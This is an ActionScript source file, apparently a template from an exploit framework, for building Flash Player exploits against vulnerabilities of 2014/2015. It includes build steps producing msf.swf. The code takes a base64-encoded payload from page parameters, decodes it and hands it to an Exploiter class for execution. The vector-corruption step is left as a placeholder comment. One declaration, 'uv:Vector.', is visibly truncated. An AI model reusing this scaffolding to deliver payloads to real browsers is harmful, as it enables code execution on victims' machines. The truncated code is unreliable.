/* Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild along 2014/2015. It uses some ideas and code included on @hdarwin89 proof of concepts. * How to build: 1. Download the AIRSDK, and use its compiler. 2. Download the Flex SDK (4.6) 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) 4. Build with: mxmlc -o msf.swf Exploit.as */ package { import flash.display.Sprite import flash.display.LoaderInfo import mx.utils.Base64Decoder import flash.utils.ByteArray public class Exploit extends Sprite { private var uv:Vector. private var b64:Base64Decoder = new Base64Decoder() private var payload:ByteArray private var platform:String private var exploiter:Exploiter public function Exploit() { platform = LoaderInfo(this.root.loaderInfo).parameters.pl var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh var pattern:RegExp = / /g; b64_payload = b64_payload.replace(pattern, "+") b64.decode(b64_payload) payload = b64.toByteArray() /* The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger. */ exploiter = new Exploiter(this, platform, payload, uv, 0x13e) } } }